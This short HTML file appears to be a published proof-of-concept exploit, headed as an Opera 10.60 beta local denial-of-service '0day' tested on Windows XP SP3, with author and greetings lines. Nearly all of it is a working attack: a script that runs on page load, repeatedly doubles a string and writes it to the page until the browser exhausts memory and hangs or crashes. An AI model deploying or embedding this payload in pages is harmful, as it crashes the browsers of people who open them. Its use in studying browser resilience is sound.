<html>
##################################{In The Name Of Allah The Mercifull}######################
# Title : opera V10.60 beta (html) 0day suffer from local Denial of Service PoC
# Tested : Windows xp (sp3)
#Author : R3d-D3v!L <X[at]hotmail.co.jp> ##
# Greetz : ##dolly & DAShER & JUPA & ov3r flow3r ##
<script>
function junk()
{
var buff="A";
for (i=0;i<15000;i++)
{
buff+=buff+"A";
document.write(buff+buff);
}
}
</script>
<body onload="javascript:junk();">
</body>
</html>